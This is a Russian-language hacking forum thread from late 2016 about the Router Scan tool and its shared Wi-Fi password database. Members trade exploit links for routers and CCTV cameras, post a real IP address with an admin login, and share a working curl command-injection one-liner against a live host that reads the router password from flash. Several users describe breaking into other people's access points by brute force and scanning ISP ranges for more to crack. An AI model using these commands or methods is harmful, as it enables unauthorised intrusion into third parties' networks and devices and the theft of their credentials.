Я правильно понимаю, когда я загружаю так, то я на самом сайте свою ж статистику посмотреть не могу?( http://prntscr.com/d7gp88



Да, совершенно верно, выгрузка из RS не привязывает к аккаунту. Пока только через загрузку с сайта.

readiv
15.11.2016, 19:41
Thomson Router, firmware: STB3.01.38 пароль определяет, а вот данные не считывает

84.236.212.144:8080 :admin

Felis-Sapiens
15.11.2016, 20:09
Thomson Router, firmware: STB3.01.38 пароль определяет, а вот данные не считывает



Добавил.

readiv
16.11.2016, 02:14
Добавил.



А нет никакой постоянной ссылки, что бы каждый раз не выпрашивать обновления?

stasstv
21.11.2016, 20:22
А как получить актуальную версию?

henri2002
21.11.2016, 21:17
А как получить актуальную версию?



лежит в этой теме.

stasstv
21.11.2016, 21:22
лежит в этой теме.



Если Вы о том, который был загружен 25 дней назад, то после этого уже были добавления.

binarymaster
21.11.2016, 22:08
А как получить актуальную версию?






после этого уже были добавления.



http://rgho.st/8wXLL9n8j

stasstv
21.11.2016, 22:09
http://rgho.st/8wXLL9n8j



Премного благодарен!

Felis-Sapiens
21.11.2016, 23:07
Там в пине нули лидирующие отсутствуют.



Если б только в пине, там число цифр известно. А как быть с числовыми паролями? Не известно, были там нули спереди или нет.

localhost
23.11.2016, 19:41
http://rgho.st/8wXLL9n8j



пароль какой и почему браузер ругается что сайт поддельный ?

henri2002
23.11.2016, 19:51
пароль какой и почему браузер ругается что сайт поддельный ?



славянский шкаф, и осторожно там вирус, ваш пароль стырят.

carartem02
24.11.2016, 00:34
славянский шкаф, и осторожно там вирус, ваш пароль стырят.


Я перешел, скачал, запустил и вот от провайдера прилетела жалоба, мол какие-то странные запросы и вы скорее всего в сети ботнета...

-Predator-
24.11.2016, 20:13
Я перешел, скачал, запустил и вот от провайдера прилетела жалоба, мол какие-то странные запросы и вы скорее всего в сети ботнета...



И часто Вам провайдер жалобы пишет? Скан выложите?

Triton_Mgn
24.11.2016, 20:18
И часто Вам провайдер жалобы пишет? Скан выложите?



После славянского шкафа не часто)) А причем газета. билет три вопрос 1.

Kakoluk
24.11.2016, 21:09
пароль какой и почему браузер ругается что сайт поддельный ?



Вероятно потому что в блек-листе, ну и потому что http а не https, обмен клиент-сервер не шифруется.

Новый тренд. Можно смеяться сколько угодно, но скоро видимо ни на одну страничку http без ругани "протекторов" нельзя зайти будет.

Triton_Mgn
24.11.2016, 21:13
Не смеши мои коленки http отворяестся, .

Kakoluk
24.11.2016, 22:02
Не смеши мои коленки http отворяестся,



Шутку понял, смешно.

Спс, квн впервые за несколько лет поглядел. Те же "шутки", тот же театрально-заводящий хохот комиссии.

carartem02
25.11.2016, 19:57
И часто Вам провайдер жалобы пишет? Скан выложите?



Первый раз. Сканил, интернет оффнули, думал проблемы у провайдера, но решил их спросить и они сказали то, что у меня очень странные запросы и проблемы у других, ради этого оффнули

stasstv
25.11.2016, 20:56
Первый раз. Сканил, интернет оффнули, думал проблемы у провайдера, но решил их спросить и они сказали то, что у меня очень странные запросы и проблемы у других, ради этого оффнули



Что за провайдер?

carartem02
25.11.2016, 21:30
Что за провайдер?



Что-то типо домру, его дочь вроде

utyara
26.11.2016, 01:19
http://s019.radikal.ru/i620/1611/35/b9c667e0ddba.png

первый раз вижу на роутер скане пин код из девяти цифр

fire-dance
26.11.2016, 02:25
http://s019.radikal.ru/i620/1611/35/b9c667e0ddba.png

первый раз вижу на роутер скане пин код из девяти цифр

utyara
26.11.2016, 03:39
?

Kakoluk
26.11.2016, 16:17
Первый раз. Сканил, интернет оффнули, думал проблемы у провайдера, но решил их спросить и они сказали то, что у меня очень странные запросы и проблемы у других, ради этого оффнули



Если это правда, то напоминает политику моего бывшего местного прова(почил с миром, - туда ему и дорога), некий PNZ(MTS, перекупил его в двухтысячные года).

Тот пров ещё не "дозволял" подключать несколько устройств на один договор(блочил статик IP до выяснения). Благо, тогда многие роутеры срали локальным траффиком наружу, и это можно было отследить.

...

- Ну это же дико, прям ещё Александра II верните.

P.S.

Если "серьёзно", - глагольте что хотели выяснить границы диапазона вашего прова, дабы настроить фаервол.

Прошу прощения, это не личное, смеюсь вовсе не над вами а над ситуацией.

user100
27.11.2016, 23:39
Бага в роутерах netgear:

Authentication Bypass

http://seclists.org/fulldisclosure/2015/Oct/29

Если еще не добавлена в RS, может пригодится.

XAMRAS
28.11.2016, 00:36
А можно ли добавить условие добавления на сайт: что пароль не может быть 1

readiv
28.11.2016, 04:44
Бага в роутерах netgear:

Authentication Bypass

http://seclists.org/fulldisclosure/2015/Oct/29

Если еще не добавлена в RS, может пригодится.



А разве \src\exploits Exploit_NETGEAR_BRS_FirstSetup.pas не он?

binarymaster
28.11.2016, 11:07
Бага в роутерах netgear:

Authentication Bypass

http://seclists.org/fulldisclosure/2015/Oct/29






А разве \src\exploits Exploit_NETGEAR_BRS_FirstSetup.pas не он?



Да, она самая, и добавлена уже давно. Но всё равно спасибо.



А можно ли добавить условие добавления на сайт: что пароль не может быть 1<=5 символов, а то очень много точек где пароль 3 или 4 символа???



Оффтопим, это в тему 3WiFi надо было писать... но в целом думаю можно.

Silverlite
28.11.2016, 18:53
Была какая то программ куда можно было загружать результаты с роутер скана и затем формировать словарик. Не могу вспомнить название. Кто нить знает где скачать?

henri2002
28.11.2016, 21:21
Была какая то программ куда можно было загружать результаты с роутер скана и затем формировать словарик. Не могу вспомнить название. Кто нить знает где скачать?



оно

http://rgho.st/6hB28P2pV

http://rgho.st/725J44BVX

RouterScan_Log

Ossen
29.11.2016, 00:15
свежий продукт?



Это уже древнее)))

henri2002
29.11.2016, 00:23
Я может, что то пропустил, а какие есть еще прикладные программы? Или это ваший свежий продукт?



нет, старый.

з.ы.

упс не заметил, уже ответили.

carartem02
29.11.2016, 19:33
Если это правда, то напоминает политику моего бывшего местного прова(почил с миром, - туда ему и дорога), некий PNZ(MTS, перекупил его в двухтысячные года).

Тот пров ещё не "дозволял" подключать несколько устройств на один договор(блочил статик IP до выяснения). Благо, тогда многие роутеры срали локальным траффиком наружу, и это можно было отследить.

...

- Ну это же дико, прям ещё Александра II верните.

P.S.

Если "серьёзно", - глагольте что хотели выяснить границы диапазона вашего прова, дабы настроить фаервол.

Прошу прощения, это не личное, смеюсь вовсе не над вами а над ситуацией.


Всё прикрылось удалением вируса

utyara
29.11.2016, 21:05
оно

http://rgho.st/6hB28P2pV

RouterScan_Log



не хочет можно через другой обменник у кого есть

binarymaster
29.11.2016, 21:54
не хочет можно через другой обменник у кого есть





wget http://polariton.rghost.ru/download/6hB28P2pV/c0bc78eade8dc8bb6855133d0ed7906fbe3207b1/RouterScan_Log.rar

utyara
29.11.2016, 22:44
wget http://polariton.rghost.ru/download/6hB28P2pV/c0bc78eade8dc8bb6855133d0ed7906fbe3207b1/RouterScan_Log.rar



binarymaster спасибо

gentux
30.11.2016, 07:35
wget



Я смотрю Вас привлек мир линукса, это радует.

По теме: данное https://www.opennet.ru/opennews/art.shtml?num=45583 описание уязвимости поможет проекту?

localhost
30.11.2016, 15:03
Я смотрю Вас привлек мир линукса, это радует.

По теме: данное https://www.opennet.ru/opennews/art.shtml?num=45583 описание уязвимости поможет проекту?



ага, очень радует =) ждем линукс версию

Silverlite
30.11.2016, 18:30
оно

http://rgho.st/6hB28P2pV

RouterScan_Log







wget http://polariton.rghost.ru/download/6hB28P2pV/c0bc78eade8dc8bb6855133d0ed7906fbe3207b1/RouterScan_Log.rar



Бесконечно благодарен!

binarymaster
01.12.2016, 01:21
несколько Sercomm Beeline Smart Box S1000.



В кодинговом экстазе вместе с @Felis-Sapiens (https://forum.antichat.xyz/members/268504/) и пачкой билайновских боксов, удалось найти новую уязвимость получения пароля администратора, без логина и бекдора.

Но пока сохраняется баг, из-за которого авторизация на роутере срабатывает не всегда, даже с правильным логином.

Держим в курсе последних событий.

Silverlite
01.12.2016, 13:45
RouterScan_Log при импортировании папки с XML листами выдает ошибку Cannot perform LOCATE on a closed dataset - Native error: 10271. Я так понял отсутствует база.

gentux
01.12.2016, 16:27
@binarymaster (https://forum.antichat.xyz/members/148032/)

Хе-хе, сегодня в rss прилетело.



В целом, и задумка, и реализация Router Scan by Stas’M выполнены на 5+ и программа уже давно приобрела свою заслуженную популярность.



https://hackware.ru/?p=1766

mrx063
02.12.2016, 12:24
Премного благодарен!



пароль не подскажешь от архива ?

stasstv
02.12.2016, 14:27
пароль не подскажешь от архива ?



пароль: название этого форума

Felis-Sapiens
02.12.2016, 18:44
Тут вот несколько билайновских боксов. Sercomm Beeline Smart Box S1000.

...

Не парсятся RS.



Исправили

stasstv
02.12.2016, 18:47
Исправили



Будет ли файлик с исправлениями?

binarymaster
02.12.2016, 21:06
Будет ли файлик с исправлениями?



Yes.

http://rgho.st/8bnQYKCcx

anklbens
03.12.2016, 18:12
Почему то если добавляю исправления в rs он просто прогоняет диапазон и вообще ни чего не ищет

binarymaster
03.12.2016, 23:32
Почему то если добавляю исправления в rs он просто прогоняет диапазон и вообще ни чего не ищет



Какие именно исправления?

anklbens
04.12.2016, 00:31
http://rgho.st/8bnQYKCcx Вот это

binarymaster
04.12.2016, 02:51
Вот это



> вообще ни чего не ищет

Скриншоты в студию, сравнение старой и новой версии.

anklbens
04.12.2016, 13:41
Все заработало.отключил антималвар скачал заново файлик все норм.

sha9
05.12.2016, 14:54
маленький почти офтоп (т.к.роутерскан парсит IP камеры и есть на форуме интересующиеся этими возможностями РС )

" эксплоит, позволяющий взломать 35 моделей камер наблюдения одним GET-запросом "

https://gist.github.com/Wack0/a3435cafa5eb372b190f971190a506b8

статья для информации

https://xakep.ru/2016/11/30/cctv-ex..._medium=digest&utm_campaign=digest_2016-12-04

может кому-то будет интересно. просьба не пинать и не кидаться обвинениями в склонности к вуайеризму.

sha9
05.12.2016, 15:21
Telnet вроде возможен и в винде



телнет-то возможен везде. и в винде тоже. но реализация в роутерскане представляет собой определенные сложности.так во всяком случае я понял из постов, где данная тема уже поднималась

localhost
05.12.2016, 15:42
маленький почти офтоп (т.к.роутерскан парсит IP камеры и есть на форуме интересующиеся этими возможностями РС )

" эксплоит, позволяющий взломать 35 моделей камер наблюдения одним GET-запросом "

https://gist.github.com/Wack0/a3435cafa5eb372b190f971190a506b8

статья для информации

https://xakep.ru/2016/11/30/cctv-ex..._medium=digest&utm_campaign=digest_2016-12-04

может кому-то будет интересно. просьба не пинать и не кидаться обвинениями в склонности к вуайеризму.


Еще одна уязвимость GoAhead (правда очень старая) https://xakep.ru/2004/01/22/20995/ позволяет просматривать некоторые защищенные каталоги, файлы

SarMatM
06.12.2016, 01:36
оно

http://rgho.st/6hB28P2pV

RouterScan_Log



Подскажите как ее заставить работать? какого-то файла не хватает. Может кто помочь ?

henri2002
06.12.2016, 02:44
Подскажите как ее заставить работать? какого-то файла не хватает. Может кто помочь ?



http://rgho.st/725J44BVX

binarymaster
06.12.2016, 11:05
скачиваешь архив, распаковываешь в папку с "старым" роутерсканом и соглашаешься на замену двух файлов. есть способ посложнее.


Выше шла речь про Router Scan Log - это не моя программа, к ней нужен немного иной подход.

sha9
06.12.2016, 11:07
Выше шла речь про Router Scan Log - это не моя программа, к ней нужен немного иной подход.


извиняюсь - не понял. пост удаляю. не купил слуховой аппарат, вот и недосмотрел. спасибо, что тыкнули носом а то опозорился-бы только

SarMatM
06.12.2016, 13:54
http://rgho.st/725J44BVX



Спасибо!!! )) Ошибку выдавать перестал, но базы все равно не импортирует, скинь образец тхт

henri2002
06.12.2016, 15:15
Спасибо!!! )) Ошибку выдавать перестал, но базы все равно не импортирует, скинь образец тхт



я этой прогой не пользуюсь, так лежит про запас.

SarMatM
08.12.2016, 13:26
Всем привет)) У меня сегодня аренда ВПС закончилась, все в нем хорошо кроме скорости инета (( Теперь думаю на что перейти, может кто поделиться ссылками или просто совет даст, что лучше юзать под Router Scan, можно в личку! Буду очень признателен за любую помощь.

henri2002
08.12.2016, 18:04
что лучше юзать под Router Scan



ганджубас.

Ossen
09.12.2016, 21:07
что лучше юзать под Router Scan



грибочки лучше весёлые такие есть

Amor
09.12.2016, 22:52
Пароль на архив изменился? Тот что в шапке не подходит.

henri2002
09.12.2016, 23:26
Пароль на архив изменился? Тот что в шапке не подходит.



а какой в шапке.

Amor
10.12.2016, 00:44
а какой в шапке.



Тут http://stascorp.com/load/1-1-0-56

henri2002
10.12.2016, 01:55
Тут http://stascorp.com/load/1-1-0-56



не ходите туда, у меня пароль от фай-фай стырили.



Имеется информация о том, что веб-страница stascorp.com содержит нежелательные программы. В соответствии с вашими настройками безопасности она была заблокирована.

Страницы с нежелательными программами пытаются установить ПО, стремящееся вас обмануть и произвести неожиданные изменения на вашем компьютере.

Amor
10.12.2016, 10:48
не ходите туда, у меня пароль от фай-фай стырили.


Да, да как скажешь.

Kakoluk
10.12.2016, 18:43
не ходите туда, у меня пароль от фай-фай стырили.


Деточка, вы вообще соображаете где находитесь?

- Вы видимо мыслите, что вся сеть цензурируется киндер-сюрпризом?

(простите, не смог удержатся от сарказма)

Amor
10.12.2016, 18:59
Так что, за пароль никто ничего не знает?

Kakoluk
10.12.2016, 19:18
Так что, за пароль никто ничего не знает?



Вы Очень внимательны, и умны, Сэр!

(Смех сквозь слёзы)

Хоспидя, неужели..

Неужели люди настолько отупели...

Kakoluk
10.12.2016, 19:31
Просто обленились



Тут ничего не скажешь, не нужно ничего придумывать.

"дайте мне сразу всё, а я ещё и пожурю за недостаток горячей воды в ванне"

Тьфу блин.

Kakoluk
10.12.2016, 19:37
пара препинаков в целый квест превратили действо



Так я из тех скоморохов, что бздят и радеют за мысли тех не сдался. За нелентяев поднимаю чарку!

Kakoluk
10.12.2016, 19:45
Все ненужное без проблем удаляется


Эхх Алекс, нам ли жить в печали?!

Вы всё думаете о праведности, чести.

Не надо, не стоит. Поверьте старому пердуну.

Самое главное, что бы вас на кладбон(кладбище) было кому нести, а ещё кому плакать при этом.

Жуть.

Kakoluk
10.12.2016, 20:22
Ребята, не поймите привратно. Был тут некий человек "Wifiadapter".

Написал весьма прекрасную программку работы с текстовыми строками под окна и .. пропал.

Может кто знает о судьбе его?

C селекцией и удалением дубликатов были проблемы(памяти не хватало), но всё можно было решить с виртуалкой или работой с диском...

Блин, то что он успел накодить прежде чем ушёл в ночь, уже класcно.

Ежели кто с ним знаком, будьте добры сказать что его вызывают.

Amor
10.12.2016, 21:38
Вы Очень внимательны, и умны, Сэр!

(Смех сквозь слёзы)

Хоспидя, неужели..

Неужели люди настолько отупели...



Евгений Ваганыч, вы что-то знаете? Так поделитесь с нами, всем интересно.

DSL2650NRU
10.12.2016, 22:08
Евгений Ваганыч, вы что-то знаете? Так поделитесь с нами, всем интересно.



Пароль из шапки верный - только что проверил.

sha9
12.12.2016, 11:15
не ходите туда, у меня пароль от фай-фай стырили.

Имеется информация о том, что веб-страница stascorp.com содержит нежелательные программы. В соответствии с вашими настройками безопасности она была заблокирована.

Страницы с нежелательными программами пытаются установить ПО, стремящееся вас обмануть и произвести неожиданные изменения на вашем компьютере.



во-во...я тоже пострадавший. меня так на сайте обманули, что до сих пор не могу с этого форума уйти.уже психологическая зависимость как от курева. спасайтесь уважаемый. вам еще не поздно....

sha9
12.12.2016, 11:22
Так что, за пароль никто ничего не знает?



таки шоб нет - так да. таки знают, но скрывают. для себя придержали. ежели всем сразу раскрывать тайны ввода пароля - так на форум никто и не заглянет. а тут глядишь и посещаемость повышается

Payer
12.12.2016, 11:25
Девушки порой такие скрытные: "Имя: Екатерина. Фамилия: скрыто. Дата рождения: скрыто. е-mаil: ivаnovа1992мэйл.ру"

gentux
12.12.2016, 17:18
@binarymaster (https://forum.antichat.xyz/members/148032/)

Роутеры NetGear подвержены серьезной уязвимости

https://habrahabr.ru/company/eset/blog/317420/

Такого промаха давно не видел.

binarymaster
12.12.2016, 17:30
Роутеры NetGear подвержены серьезной уязвимости



О, надо будет попробовать.

anklbens
12.12.2016, 21:38
Подскажите уважаемые почему рс добавляет в гуд asus но там нет лог пасс

binarymaster
12.12.2016, 22:38
Подскажите уважаемые почему рс добавляет в гуд asus но там нет лог пасс



Посмотрите в настройках, как у вас выставлен фильтр успешных результатов, и поймёте.

anklbens
13.12.2016, 00:46
Посмотрите в настройках, как у вас выставлен фильтр успешных результатов, и поймёте.



Все разобрался спасибо за ответ не внимательно читал ман)))

binarymaster
13.12.2016, 01:27
но почему-то не срабатывает.



Похоже на ограничение длины запроса.

VasiliyP
13.12.2016, 02:04
Хотелось бы так:


curl 'https://73.136.ll2.174:8443/cgi-bin/;grep$IFS"http_passwd"$IFS`pwd`dev`pwd`mtd1' -k
но почему-то не срабатывает.



Вот так вроде то, что надо (grep -m1):


curl 'https://73.136.112.174:8443/cgi-bin/;grep$IFS-m1$IFS"http_passwd"$IFS`pwd`dev`pwd`mtd1' -k

violino
13.12.2016, 19:46
Здравствуйте! А вот такой вопрос.

Есть программа. Это прекрасно, если люди добавляют в базу, и точки находятся на карте.

А как быть с теми точками, пароли к которым люди находят в ветке https://forum.antichat.ru/threads/435763/

Вот если есть название точки,мак, пин( получила, зашла на роутер ( так же получив логин /пароль к роутеру, иногда методом тыка ), и я знаю, где территориально находится эта точка. Я могу её самостоятельно добавить на карту (поставить метку)?

Если уже отвечали на данный вопрос - прошу прощения, если можно - дайте ссыль на ответ)

violino
13.12.2016, 19:55
понятно, что... мало кто это будет делать, но все же. Меня волнует - предусмотрена ли возможность вручную вносить инфу о точке

Payer
13.12.2016, 19:56
Я могу её самостоятельно добавить на карту (поставить метку)?



Вы можете к ней подключиться, просканировать Router Scan и загрузить результаты обычным способом.

violino
13.12.2016, 19:57
а если так пробовала, но точка не отображается в программе?

violino
13.12.2016, 20:09
А как мне получить возможность доступа к своей статистике? Или это невозможно?

binarymaster
14.12.2016, 00:50
В соответствии с этим изменил запрос



Теперь надо придумать, как всё это (особенно \r\n в запросе) запихнуть в эксплойт Router Scan - всё бы ничего, если не дополнительный SSL слой (https/8443).

binarymaster
14.12.2016, 01:39
а если так пробовала, но точка не отображается в программе?



Попросить нас добавить роутер в поддержку, перед этим соблюдая все процедуры оформления заявки (учитывая, что роутер скорее всего доступен лишь вам, а извне нет).



А как мне получить возможность доступа к своей статистике? Или это невозможно?



Это выходит за рамки данной темы, пишите в 3WiFi.

sha9
16.12.2016, 15:24
Взлом роутера D-Link DWR-932B



https://cryptoworld.su/vzlom-routera-d-link/

sha9
16.12.2016, 15:40
тут нашлось такое дело

" TP-Link и Zyxel имеется уязвимость. Через этот баг можно удаленно вытащить файл с пассами.

скрипт для тестирования роутеров

https://github.com/MrNasro/zynos-attacker/

с его помощью можно тестировать свой и чужой роутер

Тестируем на баг

1) Открываем http://rom-0.cz/index/ и чекаем свой модем

2) Чтобы чекать в ручном режиме вконец айпи добавляем /rom-0 пример 192.168.1.1/rom-0

3) Скачанный файл декодируем тут http://www.routerpwn.com/zynos/ "

кто-то пробовал это дело и можно ли эти уязвимости привязать к РС ?

Felis-Sapiens
16.12.2016, 15:44
кто-то пробовал это дело и можно ли эти уязвимости привязать к РС ?



Так уж есть давно. См. \src\exploits\Exploit_Rom0.pas

sha9
16.12.2016, 15:59
Так уж есть давно. См. \src\exploits\Exploit_Rom0.pas



спасибо. видно проскочил

sha9
16.12.2016, 23:40
как-то тут ранее на форуме возникала тема. может кому нужен charles (ну не нашим гуру у них давно уже все есть и работает ) наткнулся на версию 3.11.2 с кр. на рутор орг. вроде работает

http://rutracker.org/forum/viewtopic.php?t=2114687

readiv
18.12.2016, 22:33
понятно, что... мало кто это будет делать, но все же. Меня волнует - предусмотрена ли возможность вручную вносить инфу о точке



Э-э-э. Можно открыть в текстовом редакторе любой csv сформированный RS и добавить свои данные

henri2002
18.12.2016, 23:29
RS и в текстовом формате, замечательно сохраняет.

readiv
20.12.2016, 22:51
RS и в текстовом формате, замечательно сохраняет.



А 3wifi его потом примет?

binarymaster
20.12.2016, 22:58
А 3wifi его потом примет?



3WiFi в общем-то заточен больше под TXT, чем под CSV.

readiv
20.12.2016, 23:04
А мне вот внешних модулей в RS не хватает. К примеру пишем консольное приложение на любом языке под какую то конкретную уязвимость. На входе в ParamStr(1) ip, в случае удачи на выходе csv в папке обмена, а rs раз в минуту проверяет эту папку на наличие новых файлов и подхватывает из неё данные. А запуск... Ну можно фильтры как-нибудь для этого дела прикрутить.

Получаем расширяемость и уходим от жесткой привязки к http

binarymaster
20.12.2016, 23:55
К примеру пишем консольное приложение на любом языке под какую то конкретную уязвимость.

Получаем расширяемость и уходим от жесткой привязки к http



И в придачу 100% нагрузку процессора, даже многоядерного, на "густых" диапазонах. Это касается создания множества копий доп. процессов.



Не считывает пароли. Всё есть, а паролей фиг.



Пофиксил.

readiv
21.12.2016, 02:33
Да, пожалуй вы правы, но можно запускать внешние процессы в общих рамках. Возникает некоторый гемор с отслеживанием их завершения, но это вполне всё решаемо. Впрочем вам виднее

P.S. А ссылку на фикс?

binarymaster
21.12.2016, 02:40
P.S. А ссылку на фикс?



Будет, но чуть позже.

Slayer
21.12.2016, 22:11
Ребята, такой вопрос - есть вскрытая подбором пароля точка Beeline_2G_F3F147, ip 2.94.113.34 (смотрел в админке, и через 2ip.ru), при попытке сканирования этого ip РоутерСканом точка не находится, так же 2ip.ru выдаёт город, который не соответствует расположению точки (говорит Москва) - куда копать? Нужно для поиска подобной точки этого-же провайдера. Так же не нашлось ни одной точки с подобным SSID (Beeline_2G_XXXXXX) при сканировании выборки адресов ip моего города (хотя реально таких точек много).

Mistral
21.12.2016, 22:24
Ребята, такой вопрос - есть вскрытая подбором пароля точка Beeline_2G_F3F147, ip 2.94.113.34 (смотрел в админке, и через 2ip.ru), при попытке сканирования этого ip РоутерСканом точка не находится, так же 2ip.ru выдаёт город, который не соответствует расположению точки (говорит Москва) - куда копать? Нужно для поиска подобной точки этого-же провайдера. Так же не нашлось ни одной точки с подобным SSID (Beeline_2G_XXXXXX) при сканировании выборки адресов ip моего города (хотя реально таких точек много).



Так может роутеры за NAT и не имеют белых(прямых) айпи для выхода во внешнюю сеть.Сканируйте локальную сеть.

Slayer
21.12.2016, 22:32
Так может роутеры за NAT и не имеют белых(прямых) айпи для выхода во внешнюю сеть.Сканируйте локальную сеть.



Спасибо, в общем к этому и склонялся - как раз почитал всякого про белое-серое - просто уточнил, в ту ли сторону копаю. Прошу пардону, если в недалёком будущем побеспокою по-этому поводу, если не выйдет - только разбираюсь..

Lazy
21.12.2016, 23:58
Интересуют самые популярные в Польше роутеры . Нельзя ли как-то это выяснить ?

binarymaster
22.12.2016, 00:12
Интересуют самые популярные в Польше роутеры . Нельзя ли как-то это выяснить ?



Ну, если брать базу 3WiFi в качестве источника, выборка будет не совсем корректной. Поскольку это будут самые популярные вскрытые роутеры в Польше. Остальной части, которая пока не поддерживается RS'ом, в выборке не будет.

Lazy
22.12.2016, 00:55
Вскрытые и нужны . Просто на 3wifi есть поиск по карте , по широте/долготе . Есть просто общая статистика по роутерам . А как выбрать именно Польшу я не понимаю .

Alexmeh
22.12.2016, 01:11
Вскрытые и нужны . Просто на 3wifi есть поиск по карте , по широте/долготе . Есть просто общая статистика по роутерам . А как выбрать именно Польшу я не понимаю .



https://www.google.ru/maps/@53.3308727,20.5664067,5z

Курсор на нужное место, щелчек, - координаты снизу карты.

Координаты вставляем в роутерскан - получаем нужный диапазон адресов - сканируем.

binarymaster
22.12.2016, 01:53
Координаты вставляем в роутерскан



Эээ... нету в RS такой функции пока, есть в 3WiFi поиск диапазонов.

Alexmeh
22.12.2016, 10:14
Эээ... нету в RS такой функции пока, есть в 3WiFi поиск диапазонов.



Ошибся.... Извиняюсь.

Имел ввиду 3WiFi.

Slayer
23.12.2016, 17:25
Подскажите, возможна ли такая ситуация - из админки вскрытого роутера (подключился к нему по wifi) - DHCP интерфейс: IP адрес 10.174.193.202 IP шлюз 10.174.192.1 - т.е. локальная сеть провайдера - оба ip пингуются, но 10.174.193.202 не видит РоутерСкан? Защита какая-то, или 10.174.193.202 тоже промежуточное звено, и реальный ip в сети не отображается в андминке?

stasstv
23.12.2016, 17:33
Подскажите, возможна ли такая ситуация - из админки вскрытого роутера (подключился к нему по wifi) - DHCP интерфейс: IP адрес 10.174.193.202 IP шлюз 10.174.192.1 - т.е. локальная сеть провайдера - оба ip пингуются, но 10.174.193.202 не видит РоутерСкан? Защита какая-то, или 10.174.193.202 тоже промежуточное звено, и реальный ip в сети не отображается в андминке?



У вас один и тот же провайдер? Если один и тот же, то возможно закрыт порт.

Slayer
23.12.2016, 17:41
У вас один и тот же провайдер? Если один и тот же, то возможно закрыт порт.



Да, провайдер один, но с оговоркой, что провайдер один у роутера, с коротого пингую (к нему подключился по wifi) и цели (уже вскрытой брутом). Т.е. сеть одна, адрес пингуется, но РоутерСкан его не видит. А можно подробнее про порт - с этим можно что-нибудь сделать? Это всё нужно для того, чтобы понять, есть ли смысл сканировать всю локалку РоутерСканом для поиска необходимых (не вскрываемых брутом) роутеров, или бесполезно..

binarymaster
23.12.2016, 17:43
Защита какая-то, или 10.174.193.202 тоже промежуточное звено, и реальный ip в сети не отображается в андминке?



Нет, просто админка не принимает соединения на WAN интерфейс, в том числе изнутри себя.

Slayer
23.12.2016, 17:50
Нет, просто админка не принимает соединения на WAN интерфейс, в том числе изнутри себя.



А можно для начинающих попроще, никак не переварю.. Собственно суть вопроса - возможна ли ситуация, когда роутер в локалке провайдера вообще не виден РоутерСканом (при том, что пингуется), и если возможна - что с этим можно поделать. Хочется понять, есть ли смысл сканировать всю локалку РоутерСканом для поиска необходимых (не вскрываемых брутом) роутеров, или бесполезно?

зы на вс. случай - выше уточнил - пингую и сканю с другого роутера этого-же провайдера (т.е. оба уже вскрыты брутом, второй - для экспериментов, как цель).

зы2 ещё вопрос - у одного провайдера может быть больше одной локальной сети?

binarymaster
23.12.2016, 18:09
роутер в локалке провайдера вообще не виден РоутерСканом (при том, что пингуется), и если возможна - что с этим можно поделать?



Возможна. Копаться в настройках роутера, чтобы разрешить удалённое управление.



пингую и сканю с другого роутера этого-же провайдера



Тут ещё добавляется некоторая вероятность, что провайдер фильтрует соединения на порты.



у одного провайдера может быть больше одной локальной сети?



Конечно же может.

Slayer
23.12.2016, 18:21
Возможна. Копаться в настройках роутера, чтобы разрешить удалённое управление.

Тут ещё добавляется некоторая вероятность, что провайдер фильтрует соединения на порты.

Конечно же может.



Спасибо, небольшое уточнение - больше одной локальной сети в одном городе - это нормальная практика? В смысле сейчас сканирую со старого роутера Билайн (не СмартБокс), но вторая вскрытая точка - новый СмартБокс SSID вида Beeline_2G_XXXXXX - хочу найти аналогичную точку (Beeline_2G_XXXXXX), которую не смог сбрутить. Видимо имеет смысл сканировать со СмартБокса, т.к. есть вероятность, что они со старой точкой Билайн в разных локалках?

binarymaster
23.12.2016, 18:24
больше одной локальной сети в одном городе - это нормальная практика?



Как правило, между локальными сетями одного провайдера настроен обмен трафиком, то есть роутинг. А это значит, что никто кроме провайдера не сможет точно сказать, выходит ли локальная сеть за пределы города или нет. Косвенно можно узнать по обнаруженным устройствам и их координатам через геолокацию.



есть вероятность, что они со старой точкой Билайн в разных локалках?



Всё узнаётся на практике, вероятность взять неоткуда.



Видимо имеет смысл сканировать со СмартБокса



Пробуйте все варианты.

Slayer
23.12.2016, 18:31
Спасибо.

localhost
24.12.2016, 13:38
Вы сначало потрудитесь узучить мат часть, как устроены сеть что бы не задавать подобных вопросов. если хост пингуется но не определяется значит порты фильтруются - фаерволом, антивирусом либо закрыты для доступа из интернета

Также внутри локалки, провайдер тупо может запретить все возможные сканеры

Slayer
24.12.2016, 15:40
Спасибо, согласен матчасть хромает, но учитывая, что нет острой необходимости перелопачивать литературу ради хобби - просто спросил. Т.е. спасибо за ответы .

stasstv
25.12.2016, 09:45
Спасибо, согласен матчасть хромает, но учитывая, что нет острой необходимости перелопачивать литературу ради хобби - просто спросил. Т.е. спасибо за ответы .



Коли такое отношение к хобби, то Вам определённо стоит поискать себя в чём-то другом.

Slayer
25.12.2016, 11:53
Коли такое отношение к хобби, то Вам определённо стоит поискать себя в чём-то другом.



Началось - а можт я уже давно нашёл себя в чём-то другом? Самый простой способ получить информацию - спросить у тех, кто в этом разбирается, а не вычленять её из горы литературы, иначе зачем тогда вообще нужен форум? Я спросил - люди ответили, не вижу глобальной проблемы. Разобраться конечно нужно в теме по-человечески, но всегда встаёт вопрос времени - сейчас его нет, когда появится - непременно разберусь.

tigos1
25.12.2016, 19:33
Подскажите, пожалуйста такое:

в этой программе оч. много функций по подбору на РОУТЕРЫ..

Во время сканирования, она иной раз находит и видеорегистраторы.

Я в этом направлении (видеорегистраторы и IP-камеры) работаю довольно давно,

приходилось бесчисленное число раз восстанавливать утраченные пользователями пароли,

а иногда и ЛОГИНЫ (!!!)

Практически все эти устройства имеют так-сказать BACKDOOR от производителя.

(логины-пароли к бекдурам есть в свободном доступе)

Административные логины и пароли установщики (по моей статистике) меняют в 15-20% установок,

остальное - на стандартных настройках пашет годами (в т.ч и в довольно СУРЪЕЗНЫХ организациях)

Можно ли как-то сильно-сильно "пожелать" функцию, хотябы проверки на стандартные наборы в Вашей программе?

Не говорю уж о смене-добавлении нового пользователя.. )

binarymaster
25.12.2016, 19:45
Можно ли как-то сильно-сильно "пожелать" функцию, хотябы проверки на стандартные наборы в Вашей программе?



Абстрактные пожелания не принимаются.

В идеальном варианте заявка на добавление устройства оформляется следующим образом:

1. Есть устройство, вот его IP-адрес X.X.X.X и доступ по порту XXXX

2. Вот проверенные данные входа superuser:superpass

3. Устройство доступно извне, работает по протоколу HTTP/S, и его можно исследовать

Данный набор устройств не в приоритете, поэтому заявка вряд ли будет быстро исполнена. Тем не менее, правила для всех едины.

tigos1
26.12.2016, 00:02
Абстрактные пожелания не принимаются.

В идеальном варианте заявка на добавление устройства оформляется следующим образом:

